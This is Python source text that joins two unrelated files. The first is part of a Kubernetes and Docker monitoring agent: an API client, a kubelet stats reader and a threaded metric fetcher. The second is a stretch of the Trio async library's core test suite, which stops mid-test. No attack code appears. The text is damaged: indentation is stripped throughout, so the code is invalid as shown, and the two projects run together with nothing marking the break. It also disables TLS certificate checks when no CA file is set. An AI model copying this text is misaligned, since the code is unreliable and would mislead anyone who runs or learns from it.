""" Return whether or not to use SSL verification
"""
if self._ca_file:
return self._ca_file
return False
def _ensure_session( self ):
"""Create the session if it doesn't exist, otherwise do nothing
"""
if not self._session:
self._session = requests.Session()
self._session.headers.update( self._standard_headers )
def get_pod_name( self ):
""" Gets the pod name of the pod running the scalyr-agent """
return os.environ.get( 'SCALYR_K8S_POD_NAME' ) or os.environ.get( 'HOSTNAME' )
def get_node_name( self, pod_name ):
""" Gets the node name of the node running the agent """
node = os.environ.get( 'SCALYR_K8S_NODE_NAME' )
if not node:
pod = self.query_pod( self.namespace, pod_name )
spec = pod.get( 'spec', {} )
node = spec.get( 'nodeName' )
return node
def get_cluster_name( self ):
""" Returns the name of the cluster running this agent.
There is no way to get this from the k8s API so we check the following:
If the environment variable SCALYR_K8S_CLUSTER_NAME is set, then use that.
Otherwise query the api for the pod running the agent container and check to see
if it has an annotation: agent.config.scalyr.com/cluster_name, and if so, use that.
Otherwise return None
"""
cluster = os.environ.get( 'SCALYR_K8S_CLUSTER_NAME' )
if cluster:
return cluster
pod_name = self.get_pod_name()
pod = self.query_pod( self.namespace, pod_name )
if pod is None:
return None
metadata = pod.get( 'metadata', {} )
annotations = metadata.get( 'annotations', {} )
if 'agent.config.scalyr.com/cluster_name' in annotations:
return annotations['agent.config.scalyr.com/cluster_name']
return None
def query_api( self, path, pretty=0 ):
""" Queries the k8s API at 'path', and converts OK responses to JSON objects
"""
self._ensure_session()
pretty='pretty=%d' % pretty
if "?" in path:
pretty = '&%s' % pretty
else:
pretty = '?%s' % pretty
url = self._http_host + path + pretty
response = self._session.get( url, verify=self._verify_connection(), timeout=self._timeout )
response.encoding = "utf-8"
if response.status_code != 200:
if response.status_code == 401 or response.status_code == 403:
raise K8sApiAuthorizationException( path )
global_log.log(scalyr_logging.DEBUG_LEVEL_3, "Invalid response from K8S API.\n\turl: %s\n\tstatus: %d\n\tresponse length: %d"
% ( url, response.status_code, len(response.text)), limit_once_per_x_secs=300, limit_key='k8s_api_query' )
raise K8sApiException( "Invalid response from Kubernetes API when querying '%s': %s" %( path, str( response ) ) )
return util.json_decode( response.text )
def query_object( self, kind, namespace, name ):
""" Queries a single object from the k8s api based on an object kind, a namespace and a name
An empty dict is returned if the object kind is unknown, or if there is an error generating
an appropriate query string
@param: kind - the kind of the object
@param: namespace - the namespace to query in
@param: name - the name of the object
@return - a dict returned by the query
"""
if kind not in _OBJECT_ENDPOINTS:
global_log.warn( 'k8s API - tried to query invalid object type: %s, %s, %s' % (kind, namespace, name),
limit_once_per_x_secs=300, limit_key='k8s_api_query-%s' % kind )
return {}
query = None
try:
query = _OBJECT_ENDPOINTS[kind]['single'].substitute( name=name, namespace=namespace )
except Exception, e:
global_log.warn( 'k8s API - failed to build query string - %s' % (str(e)),
limit_once_per_x_secs=300, limit_key='k8s_api_build_query-%s' % kind )
return {}
return self.query_api( query )
def query_objects( self, kind, namespace=None, filter=None ):
""" Queries a list of objects from the k8s api based on an object kind, optionally limited by
a namespace and a filter
A dict containing an empty 'items' array is returned if the object kind is unknown, or if there is an error generating
an appropriate query string
"""
if kind not in _OBJECT_ENDPOINTS:
global_log.warn( 'k8s API - tried to list invalid object type: %s, %s' % (kind, namespace),
limit_once_per_x_secs=300, limit_key='k8s_api_list_query-%s' % kind )
return { 'items': [] }
query = _OBJECT_ENDPOINTS[kind]['list-all']
if namespace:
try:
query = _OBJECT_ENDPOINTS[kind]['list'].substitute( namespace=namespace )
except Exception, e:
global_log.warn( 'k8s API - failed to build namespaced query list string - %s' % (str(e)),
limit_once_per_x_secs=300, limit_key='k8s_api_build_list_query-%s' % kind )
if filter:
query = "%s?fieldSelector=%s" % (query, urllib.quote( filter ))
return self.query_api( query )
def query_pod( self, namespace, name ):
"""Convenience method for query a single pod"""
return self.query_object( 'Pod', namespace, name )
def query_pods( self, namespace=None, filter=None ):
"""Convenience method for query a single pod"""
return self.query_objects( 'Pod', namespace, filter )
def query_namespaces( self ):
"""Wrapper to query all namespaces"""
return self.query_api( '/api/v1/namespaces' )
def stream_events( self, path="/api/v1/watch/events", last_event=None ):
"""Streams k8s events from location specified at path"""
self._ensure_session()
url = self._http_host + path
if last_event:
resource='resourceVersion=%s' % str(last_event)
if "?" in url:
resource = '&%s' % resource
else:
resource = '?%s' % resource
url += resource
response = self._session.get( url, verify=self._verify_connection(), timeout=self._timeout, stream=True )
if response.status_code != 200:
global_log.log(scalyr_logging.DEBUG_LEVEL_0, "Invalid response from K8S API.\n\turl: %s\n\tstatus: %d\n\tresponse length: %d"
% ( url, response.status_code, len(response.text)), limit_once_per_x_secs=300, limit_key='k8s_stream_events' )
raise K8sApiException( "Invalid response from Kubernetes API when querying %d - '%s': %s" % ( response.status_code, path, str( response ) ) )
for line in response.iter_lines():
if line:
yield line
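# A minimal sketch (not part of the original module) of querying the API wrapper
# directly. query_object() builds the 'single' endpoint for the kind, while
# query_objects() uses the namespaced 'list' endpoint plus an optional fieldSelector.
# The namespace, pod name and selector values are examples.
def _example_kubernetes_api_queries():
    k8s = KubernetesApi()
    pod = k8s.query_object( 'Pod', 'default', 'my-pod' )
    deployments = k8s.query_objects( 'Deployment', namespace='default',
                                     filter='metadata.name!=excluded-deployment' )
    return pod, deployments.get( 'items', [] )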
class KubeletApi( object ):
"""
A class for querying the kubelet API
"""
def __init__( self, k8s, port=10255 ):
"""
@param k8s - a KubernetesApi object
"""
pod_name = k8s.get_pod_name()
pod = k8s.query_pod( k8s.namespace, pod_name )
spec = pod.get( 'spec', {} )
status = pod.get( 'status', {} )
host_ip = status.get( 'hostIP', None )
if host_ip is None:
raise KubeletApiException( "Unable to get host IP for pod: %s/%s" % (k8s.namespace, pod_name) )
self._session = requests.Session()
headers = {
'Accept': 'application/json',
}
self._session.headers.update( headers )
self._http_host = "http://%s:%d" % ( host_ip, port )
self._timeout = 10.0
def query_api( self, path ):
""" Queries the kubelet API at 'path', and converts OK responses to JSON objects
"""
url = self._http_host + path
response = self._session.get( url, timeout=self._timeout )
response.encoding = "utf-8"
if response.status_code != 200:
global_log.log(scalyr_logging.DEBUG_LEVEL_3, "Invalid response from Kubelet API.\n\turl: %s\n\tstatus: %d\n\tresponse length: %d"
% ( url, response.status_code, len(response.text)), limit_once_per_x_secs=300, limit_key='kubelet_api_query' )
raise KubeletApiException( "Invalid response from Kubelet API when querying '%s': %s" %( path, str( response ) ) )
return util.json_decode( response.text )
def query_stats( self ):
return self.query_api( '/stats/summary')
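# A minimal sketch (not part of the original module): the kubelet's read-only port
# (10255 by default) serves node and pod level stats as JSON under /stats/summary.
# Assumes it is called with an already-constructed KubernetesApi instance.
def _example_kubelet_stats( k8s ):
    kubelet = KubeletApi( k8s )
    summary = kubelet.query_stats()
    return summary.get( 'node', {} ), summary.get( 'pods', [] )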
class DockerMetricFetcher(object):
"""Allows for parallel fetching of container metrics from Docker. Typically, one instance of this object
will be created per monitor (Docker or Kubernetes). This current implementation relies on threads to
issue multiple `stats` requests in parallel.
This approach is necessary because the `stats` Docker command blocks for 2 seconds while it gathers
cpu measures over the interval. If we had 40 containers whose metrics we were trying to retrieve, we would
have to wait for a total of 80 seconds if we issued the `stats` request one at a time.
To get the benefit of this approach, you must first invoke `prefetch_metrics` for each container whose metrics
you wish to retrieve, and then invoke `get_metrics` to actually get the metrics.
"""
def __init__(self, docker_client, concurrency, logger):
"""
@param docker_client: The docker client object to use for issuing `stats` requests.
@param concurrency: The maximum number of `stats` requests to issue in parallel. This controls the maximum
number of threads that will be created.
@param logger: The logger
@type docker_client: k8s_test.MetricFaker
@type concurrency: int
@type logger: scalyr_agent.scalyr_logging.AgentLogger
"""
self.__docker_client = docker_client
self.__logger = logger
self.__concurrency = concurrency
# A sentinel value used in the `__container_scoreboard` to indicate the container is in the queue to be fetched.
self.__PENDING = dict()
# A sentinel value used in the `__container_scoreboard` to indicate the `stats` call for a container has been
# issued but no response has been received.
self.__IN_FLIGHT = dict()
# The lock that must be held for all other state variables in this class.
self.__lock = threading.Lock()
# Records the state of requesting metrics for all containers. Maps the container name to its state or
        # metric value. If the value is __PENDING, then the `stats` request for that container has not been issued.
# If it is __IN_FLIGHT, it has been requested. If it is None, an error occurred. Otherwise, the value
# is the result of the `stats` request.
self.__container_scoreboard = dict()
# Whether or not `stop` has been invoked.
self.__is_stopped = False
# The conditional variable that can be waited on to be notified of any changes to the state of this object,
        # such as whether it has been stopped or if a stats result has been added to `__container_scoreboard`.
self.__cv = threading.Condition(self.__lock)
# The number of worker threads (to perform `stats` calls) that have been created. This will always be
        # less than or equal to `concurrency`.
self.__num_worker_threads = 0
# A list of containers whose metrics should be fetched. This is the same as all entries in
# `__container_scoreboard` whose value is `__PENDING`.
self.__pending_fetches = []
# The total number of containers in `__container_scoreboard` with value either `__PENDING` or `__IN_FLIGHT`.
self.__remaining_metrics_count = 0
# The number of worker threads blocked, waiting for a container to fetch its metrics.
self.__idle_workers_count = 0
def prefetch_metrics(self, container_id):
"""Initiates requesting invoking `stats` for the specified container. If you invoke this, you must
also eventually invoke `get_metrics` with the same container. By invoking this first, the `get_metrics`
call will take less time when issuing many `stats` requests.
Whenever possible, you should first invoke this method for all containers whose metrics you wish to request
before any call to `get_metrics`.
The behavior is not well defined if you invoke `prefetch_metrics` multiple times for a container before
invoking `get_metrics` for it.
@param container_id: The id of the container to fetch.
@type container_id: str
"""
self.__lock.acquire()
try:
if container_id not in self.__container_scoreboard:
self._add_fetch_task(container_id)
finally:
self.__lock.release()
def get_metrics(self, container_id):
"""Blocks until the `stats` call for the specified container is received. If `prefetch_metrics` was not
invoked already for this container, then the `stats` request will be issued.
@param container_id: The container whose metrics should be fetched.
@type container_id: str
@return The metrics for the container, or None if there was an error or if `stop` was invoked on this object.
@rtype JSON
"""
self.__lock.acquire()
try:
while True:
if self.__is_stopped:
return None
                # Issue the fetch now if it was not already prefetched.
if container_id not in self.__container_scoreboard:
self._add_fetch_task(container_id)
status = self.__container_scoreboard[container_id]
if status is not self.__PENDING and status is not self.__IN_FLIGHT:
result = self.__container_scoreboard[container_id]
del self.__container_scoreboard[container_id]
return result
# Otherwise no result has been received yet.. wait..
self.__cv.wait()
finally:
self.__lock.release()
def stop(self):
"""Stops the fetcher. Any calls blocking on `get_metrics` will finish and return `None`. All threads
started by this instance will be stopped (though, this method does not wait on them to terminate).
"""
self.__lock.acquire()
try:
self.__is_stopped = True
# Notify all threads that may be waiting on a new container or waiting on a metric result that we have
# been stopped.
self.__cv.notifyAll()
finally:
self.__lock.release()
def idle_workers(self):
"""
Used for testing.
@return: The number of worker threads currently blocking, waiting for a container whose metrics need fetching.
@rtype: int
"""
self.__lock.acquire()
try:
return self.__idle_workers_count
finally:
self.__lock.release()
def _get_fetch_task(self):
"""Blocks until either there is a new container whose metrics need to be fetched or until this instance
is stopped.
@return: A tuple containing the container whose metrics should be fetched and a boolean indicating if the
instance has been stopped. If it has been stopped, the container will be None.
@rtype: (str, bool)
"""
self.__lock.acquire()
try:
while True:
if self.__is_stopped:
return None, True
if len(self.__pending_fetches) > 0:
container = self.__pending_fetches.pop(0)
                    self.__container_scoreboard[container] = self.__IN_FLIGHT
self.__idle_workers_count -= 1
return container, False
self.__cv.wait()
finally:
self.__lock.release()
def __start_workers(self, count):
"""Start `count` worker threads that will fetch metrics results.
@param count: The number of threads to start.
@type count: int
"""
new_number_workers = min(self.__concurrency, count + self.__num_worker_threads)
for i in range(self.__num_worker_threads, new_number_workers):
x = threading.Thread(target=self.__worker)
# Set daemon so this thread does not need to be finished for the overall process to stop. This allows
# the process to terminate even if a `stats` request is still in-flight.
x.setDaemon(True)
x.start()
self.__num_worker_threads += 1
            # For accounting purposes, we consider the thread idle until it actually has a container it is fetching.
self.__idle_workers_count += 1
def __worker(self):
"""The body for the worker threads.
"""
while True:
# Get the next container to fetch if there is one.
container_id, is_stopped = self._get_fetch_task()
if is_stopped:
return
result = None
try:
self.__logger.log(scalyr_logging.DEBUG_LEVEL_3,
'Attempting to retrieve metrics for cid=%s' % container_id)
result = self.__docker_client.stats(container=container_id, stream=False)
except Exception, e:
self.__logger.error("Error readings stats for '%s': %s\n%s" % (container_id, str(e),
traceback.format_exc()),
limit_once_per_x_secs=300, limit_key='api-stats-%s' % container_id)
self._record_fetch_result(container_id, result)
def _add_fetch_task(self, container_id):
"""Adds the specified container to the list of containers whose metrics will be fetched. Eventually, a worker
thread will grab this container and fetch its metrics.
IMPORTANT: callers must hold `__lock` when invoking this method.
@param container_id: The container whose metrics should be fetched.
@type container_id: str
"""
self.__remaining_metrics_count += 1
self.__container_scoreboard[container_id] = self.__PENDING
self.__pending_fetches.append(container_id)
# Notify any worker threads waiting for a container.
self.__cv.notifyAll()
# We need to spin up new worker threads if the amount of remaining metrics (PENDING or IN-FLIGHT) is greater
# than the number of threads we already have.
if self.__remaining_metrics_count > self.__num_worker_threads and self.__num_worker_threads < self.__concurrency:
self.__start_workers(self.__remaining_metrics_count - self.__num_worker_threads)
def _record_fetch_result(self, container_id, result):
"""Record that the `stats` result for the specified container. If there was an error, result should be
None.
@type container_id: str
@type result: JsonObject
"""
self.__lock.acquire()
try:
self.__container_scoreboard[container_id] = result
self.__remaining_metrics_count -= 1
# Since this is only invoked by a worker once their stats call is done, we know they are now idle.
self.__idle_workers_count += 1
# Wake up any thread that was waiting on this result.
self.__cv.notifyAll()
finally:
self.__lock.release()
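# A minimal sketch (not part of the original module) of the prefetch-then-get
# pattern the DockerMetricFetcher docstring describes: queue every container first
# so the 2-second blocking `stats` calls overlap, then collect the results.
# The docker client, logger and container ids are assumed to be supplied by the caller.
def _example_metric_fetcher( docker_client, logger, container_ids ):
    fetcher = DockerMetricFetcher( docker_client, concurrency=8, logger=logger )
    for cid in container_ids:
        fetcher.prefetch_metrics( cid )
    results = dict( (cid, fetcher.get_metrics( cid )) for cid in container_ids )
    fetcher.stop()
    return results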
test_run.py
import contextvars
import functools
import platform
import sys
import threading
import time
import types
import warnings
import weakref
from contextlib import contextmanager, ExitStack
from math import inf
from textwrap import dedent
import gc
import attr
import outcome
import sniffio
import pytest
from .tutil import (
slow,
check_sequence_matches,
gc_collect_harder,
ignore_coroutine_never_awaited_warnings,
buggy_pypy_asyncgens,
restore_unraisablehook,
create_asyncio_future_in_new_loop,
)
from ... import _core
from .._run import DEADLINE_HEAP_MIN_PRUNE_THRESHOLD
from ..._threads import to_thread_run_sync
from ..._timeouts import sleep, fail_after
from ...testing import (
wait_all_tasks_blocked,
Sequencer,
assert_checkpoints,
)
# slightly different from _timeouts.sleep_forever because it returns the value
# it's rescheduled with, which is really only useful for tests of
# rescheduling...
async def sleep_forever():
return await _core.wait_task_rescheduled(lambda _: _core.Abort.SUCCEEDED)
def test_basic():
async def trivial(x):
return x
assert _core.run(trivial, 8) == 8
with pytest.raises(TypeError):
# Missing an argument
_core.run(trivial)
with pytest.raises(TypeError):
# Not an async function
_core.run(lambda: None)
async def trivial2(x):
await _core.checkpoint()
return x
assert _core.run(trivial2, 1) == 1
def test_initial_task_error():
async def main(x):
raise ValueError(x)
with pytest.raises(ValueError) as excinfo:
_core.run(main, 17)
assert excinfo.value.args == (17,)
def test_run_nesting():
async def inception():
async def main(): # pragma: no cover
pass
return _core.run(main)
with pytest.raises(RuntimeError) as excinfo:
_core.run(inception)
assert "from inside" in str(excinfo.value)
async def test_nursery_warn_use_async_with():
with pytest.raises(RuntimeError) as excinfo:
on = _core.open_nursery()
with on:
pass # pragma: no cover
excinfo.match(
r"use 'async with open_nursery\(...\)', not 'with open_nursery\(...\)'"
)
# avoid unawaited coro.
async with on:
pass
async def test_nursery_main_block_error_basic():
exc = ValueError("whoops")
with pytest.raises(ValueError) as excinfo:
async with _core.open_nursery():
raise exc
assert excinfo.value is exc
async def test_child_crash_basic():
exc = ValueError("uh oh")
async def erroring():
raise exc
try:
# nursery.__aexit__ propagates exception from child back to parent
async with _core.open_nursery() as nursery:
nursery.start_soon(erroring)
except ValueError as e:
assert e is exc
async def test_basic_interleave():
async def looper(whoami, record):
for i in range(3):
record.append((whoami, i))
await _core.checkpoint()
record = []
async with _core.open_nursery() as nursery:
nursery.start_soon(looper, "a", record)
nursery.start_soon(looper, "b", record)
check_sequence_matches(
record, [{("a", 0), ("b", 0)}, {("a", 1), ("b", 1)}, {("a", 2), ("b", 2)}]
)
def test_task_crash_propagation():
looper_record = []
async def looper():
try:
while True:
await _core.checkpoint()
except _core.Cancelled:
print("looper cancelled")
looper_record.append("cancelled")
async def crasher():
raise ValueError("argh")
async def main():
async with _core.open_nursery() as nursery:
nursery.start_soon(looper)
nursery.start_soon(crasher)
with pytest.raises(ValueError) as excinfo:
_core.run(main)
assert looper_record == ["cancelled"]
assert excinfo.value.args == ("argh",)
def test_main_and_task_both_crash():
# If main crashes and there's also a task crash, then we get both in a
# MultiError
async def crasher():
raise ValueError
async def main():
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher)
raise KeyError
with pytest.raises(_core.MultiError) as excinfo:
_core.run(main)
print(excinfo.value)
assert {type(exc) for exc in excinfo.value.exceptions} == {
ValueError,
KeyError,
}
def test_two_child_crashes():
async def crasher(etype):
raise etype
async def main():
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher, KeyError)
nursery.start_soon(crasher, ValueError)
with pytest.raises(_core.MultiError) as excinfo:
_core.run(main)
assert {type(exc) for exc in excinfo.value.exceptions} == {
ValueError,
KeyError,
}
async def test_child_crash_wakes_parent():
async def crasher():
raise ValueError
with pytest.raises(ValueError):
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher)
await sleep_forever()
async def test_reschedule():
t1 = None
t2 = None
async def child1():
nonlocal t1, t2
t1 = _core.current_task()
print("child1 start")
x = await sleep_forever()
print("child1 woke")
assert x == 0
print("child1 rescheduling t2")
_core.reschedule(t2, outcome.Error(ValueError()))
print("child1 exit")
async def child2():
nonlocal t1, t2
print("child2 start")
t2 = _core.current_task()
_core.reschedule(t1, outcome.Value(0))
print("child2 sleep")
with pytest.raises(ValueError):
await sleep_forever()
print("child2 successful exit")
async with _core.open_nursery() as nursery:
nursery.start_soon(child1)
# let t1 run and fall asleep
await _core.checkpoint()
nursery.start_soon(child2)
async def test_current_time():
t1 = _core.current_time()
# Windows clock is pretty low-resolution -- appveyor tests fail unless we
# sleep for a bit here.
time.sleep(time.get_clock_info("perf_counter").resolution)
t2 = _core.current_time()
assert t1 < t2
async def test_current_time_with_mock_clock(mock_clock):
start = mock_clock.current_time()
assert mock_clock.current_time() == _core.current_time()
assert mock_clock.current_time() == _core.current_time()
mock_clock.jump(3.14)
assert start + 3.14 == mock_clock.current_time() == _core.current_time()
async def test_current_clock(mock_clock):
assert mock_clock is _core.current_clock()
async def test_current_task():
parent_task = _core.current_task()
async def child():
assert _core.current_task().parent_nursery.parent_task is parent_task
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
async def test_root_task():
root = _core.current_root_task()
assert root.parent_nursery is root.eventual_parent_nursery is None
def test_out_of_context():
with pytest.raises(RuntimeError):
_core.current_task()
with pytest.raises(RuntimeError):
_core.current_time()
async def test_current_statistics(mock_clock):
# Make sure all the early startup stuff has settled down
await wait_all_tasks_blocked()
# A child that sticks around to make some interesting stats:
async def child():
try:
await sleep_forever()
except _core.Cancelled:
pass
stats = _core.current_statistics()
print(stats)
# 2 system tasks + us
assert stats.tasks_living == 3
assert stats.run_sync_soon_queue_size == 0
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
await wait_all_tasks_blocked()
token = _core.current_trio_token()
token.run_sync_soon(lambda: None)
token.run_sync_soon(lambda: None, idempotent=True)
stats = _core.current_statistics()
print(stats)
# 2 system tasks + us + child
assert stats.tasks_living == 4
# the exact value here might shift if we change how we do accounting
# (currently it only counts tasks that we already know will be
# runnable on the next pass), but still useful to at least test the
# difference between now and after we wake up the child:
assert stats.tasks_runnable == 0
assert stats.run_sync_soon_queue_size == 2
nursery.cancel_scope.cancel()
stats = _core.current_statistics()
print(stats)
assert stats.tasks_runnable == 1
# Give the child a chance to die and the run_sync_soon a chance to clear
await _core.checkpoint()
await _core.checkpoint()
with _core.CancelScope(deadline=_core.current_time() + 5):
stats = _core.current_statistics()
print(stats)
assert stats.seconds_to_next_deadline == 5
stats = _core.current_statistics()
print(stats)
assert stats.seconds_to_next_deadline == inf
async def test_cancel_scope_repr(mock_clock):
scope = _core.CancelScope()
assert "unbound" in repr(scope)
with scope:
assert "active" in repr(scope)
scope.deadline = _core.current_time() - 1
assert "deadline is 1.00 seconds ago" in repr(scope)
scope.deadline = _core.current_time() + 10
assert "deadline is 10.00 seconds from now" in repr(scope)
# when not in async context, can't get the current time
assert "deadline" not in await to_thread_run_sync(repr, scope)
scope.cancel()
assert "cancelled" in repr(scope)
assert "exited" in repr(scope)
def test_cancel_points():
async def main1():
with _core.CancelScope() as scope:
await _core.checkpoint_if_cancelled()
scope.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint_if_cancelled()
_core.run(main1)
async def main2():
with _core.CancelScope() as scope:
await _core.checkpoint()
scope.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
_core.run(main2)
async def main3():
with _core.CancelScope() as scope:
scope.cancel()
with pytest.raises(_core.Cancelled):
await sleep_forever()
_core.run(main3)
async def main4():
with _core.CancelScope() as scope:
scope.cancel()
await _core.cancel_shielded_checkpoint()
await _core.cancel_shielded_checkpoint()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
_core.run(main4)
async def test_cancel_edge_cases():
with _core.CancelScope() as scope:
# Two cancels in a row -- idempotent
scope.cancel()
scope.cancel()
await _core.checkpoint()
assert scope.cancel_called
assert scope.cancelled_caught
with _core.CancelScope() as scope:
# Check level-triggering
scope.cancel()
with pytest.raises(_core.Cancelled):
await sleep_forever()
with pytest.raises(_core.Cancelled):
await sleep_forever()
async def test_cancel_scope_multierror_filtering():
async def crasher():
raise KeyError
try:
with _core.CancelScope() as outer:
try:
async with _core.open_nursery() as nursery:
# Two children that get cancelled by the nursery scope
nursery.start_soon(sleep_forever) # t1
nursery.start_soon(sleep_forever) # t2
nursery.cancel_scope.cancel()
with _core.CancelScope(shield=True):
await wait_all_tasks_blocked()
# One child that gets cancelled by the outer scope
nursery.start_soon(sleep_forever) # t3
outer.cancel()
# And one that raises a different error
nursery.start_soon(crasher) # t4
# and then our __aexit__ also receives an outer Cancelled
except _core.MultiError as multi_exc:
# Since the outer scope became cancelled before the
# nursery block exited, all cancellations inside the
# nursery block continue propagating to reach the
# outer scope.
assert len(multi_exc.exceptions) == 5
summary = {}
for exc in multi_exc.exceptions:
summary.setdefault(type(exc), 0)
summary[type(exc)] += 1
assert summary == {_core.Cancelled: 4, KeyError: 1}
raise
except AssertionError: # pragma: no cover
raise
except BaseException as exc:
# This is outside the outer scope, so all the Cancelled
# exceptions should have been absorbed, leaving just a regular
# KeyError from crasher()
assert type(exc) is KeyError
else: # pragma: no cover
assert False
async def test_precancelled_task():
# a task that gets spawned into an already-cancelled nursery should begin
# execution (https://github.com/python-trio/trio/issues/41), but get a
# cancelled error at its first blocking call.
record = []
async def blocker():
record.append("started")
await sleep_forever()
async with _core.open_nursery() as nursery:
nursery.cancel_scope.cancel()
nursery.start_soon(blocker)
assert record == ["started"]
async def test_cancel_shielding():
with _core.CancelScope() as outer:
with _core.CancelScope() as inner:
await _core.checkpoint()
outer.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
assert inner.shield is False
with pytest.raises(TypeError):
inner.shield = "hello"
assert inner.shield is False
inner.shield = True
assert inner.shield is True
# shield protects us from 'outer'
await _core.checkpoint()
with _core.CancelScope() as innerest:
innerest.cancel()
# but it doesn't protect us from scope inside inner
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
await _core.checkpoint()
inner.shield = False
# can disable shield again
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
# re-enable shield
inner.shield = True
await _core.checkpoint()
# shield doesn't protect us from inner itself
inner.cancel()
# This should now raise, but be absorbed by the inner scope
await _core.checkpoint()
assert inner.cancelled_caught
# make sure that cancellation propagates immediately to all children
async def test_cancel_inheritance():
record = set()
async def leaf(ident):
try:
await sleep_forever()
except _core.Cancelled:
record.add(ident)
async def worker(ident):
async with _core.open_nursery() as nursery:
nursery.start_soon(leaf, ident + "-l1")
nursery.start_soon(leaf, ident + "-l2")
async with _core.open_nursery() as nursery:
nursery.start_soon(worker, "w1")
nursery.start_soon(worker, "w2")
nursery.cancel_scope.cancel()
assert record == {"w1-l1", "w1-l2", "w2-l1", "w2-l2"}
async def test_cancel_shield_abort():
with _core.CancelScope() as outer:
async with _core.open_nursery() as nursery:
outer.cancel()
nursery.cancel_scope.shield = True
# The outer scope is cancelled, but this task is protected by the
# shield, so it manages to get to sleep
record = []
async def sleeper():
record.append("sleeping")
try:
await sleep_forever()
except _core.Cancelled:
record.append("cancelled")
nursery.start_soon(sleeper)
await wait_all_tasks_blocked()
assert record == ["sleeping"]
# now when we unshield, it should abort the sleep.
nursery.cancel_scope.shield = False
# wait for the task to finish before entering the nursery
# __aexit__, because __aexit__ could make it spuriously look like
# this worked by cancelling the nursery scope. (When originally
# written, without these last few lines, the test spuriously
# passed, even though shield assignment was buggy.)
with _core.CancelScope(shield=True):
await wait_all_tasks_blocked()
assert record == ["sleeping", "cancelled"]
async def test_basic_timeout(mock_clock):
start = _core.current_time()
with _core.CancelScope() as scope:
assert scope.deadline == inf
scope.deadline = start + 1
assert scope.deadline == start + 1
assert not scope.cancel_called
mock_clock.jump(2)
await _core.checkpoint()
await _core.checkpoint()
await _core.checkpoint()
assert not scope.cancel_called
start = _core.current_time()
with _core.CancelScope(deadline=start + 1) as scope:
mock_clock.jump(2)
await sleep_forever()
# But then the scope swallowed the exception... but we can still see it
# here:
assert scope.cancel_called
assert scope.cancelled_caught
# changing deadline
start = _core.current_time()
with _core.CancelScope() as scope:
await _core.checkpoint()
scope.deadline = start + 10
await _core.checkpoint()
mock_clock.jump(5)
await _core.checkpoint()
scope.deadline = start + 1
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
async def test_cancel_scope_nesting():
# Nested scopes: if two triggering at once, the outer one wins
with _core.CancelScope() as scope1:
with _core.CancelScope() as scope2:
with _core.CancelScope() as scope3:
scope3.cancel()
scope2.cancel()
await sleep_forever()
assert scope3.cancel_called
assert not scope3.cancelled_caught
assert scope2.cancel_called
assert scope2.cancelled_caught
assert not scope1.cancel_called
assert not scope1.cancelled_caught
# shielding
with _core.CancelScope() as scope1:
with _core.CancelScope() as scope2:
scope1.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
scope2.shield = True
await _core.checkpoint()
scope2.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
# if a scope is pending, but then gets popped off the stack, then it
# isn't delivered
with _core.CancelScope() as scope:
scope.cancel()
await _core.cancel_shielded_checkpoint()
await _core.checkpoint()
assert not scope.cancelled_caught
# Regression test for https://github.com/python-trio/trio/issues/1175
async def test_unshield_while_cancel_propagating():
with _core.CancelScope() as outer:
with _core.CancelScope() as inner:
outer.cancel()
try:
await _core.checkpoint()
finally:
inner.shield = True
assert outer.cancelled_caught and not inner.cancelled_caught
async def test_cancel_unbound():
async def sleep_until_cancelled(scope):
with scope, fail_after(1):
await sleep_forever()
# Cancel before entry
scope = _core.CancelScope()
scope.cancel()
async with _core.open_nursery() as nursery:
nursery.start_soon(sleep_until_cancelled, scope)
# Cancel after entry
scope = _core.CancelScope()
async with _core.open_nursery() as nursery:
nursery.start_soon(sleep_until_cancelled, scope)
await wait_all_tasks_blocked()
scope.cancel()
# Shield before entry
scope = _core.CancelScope()
scope.shield = True
with _core.CancelScope() as outer, scope:
outer.cancel()
await _core.checkpoint()
scope.shield = False
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
# Can't reuse
with _core.CancelScope() as scope:
await _core.checkpoint()
scope.cancel()
await _core.checkpoint()
assert scope.cancel_called
assert not scope.cancelled_caught
with pytest.raises(RuntimeError) as exc_info:
with scope:
pass # pragma: no cover
assert "single 'with' block" in str(exc_info.value)
# Can't reenter
with _core.CancelScope() as scope:
with pytest.raises(RuntimeError) as exc_info:
with scope:
pass # pragma: no cover
assert "single 'with' block" in str(exc_info.value)
# Can't enter from multiple tasks simultaneously
scope = _core.CancelScope()
async def enter_scope():
with scope:
await sleep_forever()
async with _core.open_nursery() as nursery:
nursery.start_soon(enter_scope, name="this one")
await wait_all_tasks_blocked()
with pytest.raises(RuntimeError) as exc_info:
with scope:
pass # pragma: no cover
assert "single 'with' block" in str(exc_info.value)
nursery.cancel_scope.cancel()
# If not yet entered, cancel_called is true when the deadline has passed
# even if cancel() hasn't been called yet
scope = _core.CancelScope(deadline=_core.current_time() + 1)
assert not scope.cancel_called
scope.deadline -= 1
assert scope.cancel_called
scope.deadline += 1
assert scope.cancel_called # never become un-cancelled
async def test_cancel_scope_misnesting():
outer = _core.CancelScope()
inner = _core.CancelScope()
with ExitStack() as stack:
stack.enter_context(outer)
with inner:
with pytest.raises(RuntimeError, match="still within its child"):
stack.close()
# No further error is raised when exiting the inner context
# If there are other tasks inside the abandoned part of the cancel tree,
# they get cancelled when the misnesting is detected
async def task1():
with pytest.raises(_core.Cancelled):
await sleep_forever()
# Even if inside another cancel scope
async def task2():
with _core.CancelScope():
with pytest.raises(_core.Cancelled):
await sleep_forever()
with ExitStack() as stack:
stack.enter_context(_core.CancelScope())
async with _core.open_nursery() as nursery:
nursery.start_soon(task1)
nursery.start_soon(task2)
await wait_all_tasks_blocked()
with pytest.raises(RuntimeError, match="still within its child"):
stack.close()
# Variant that makes the child tasks direct children of the scope
# that noticed the misnesting:
nursery_mgr = _core.open_nursery()
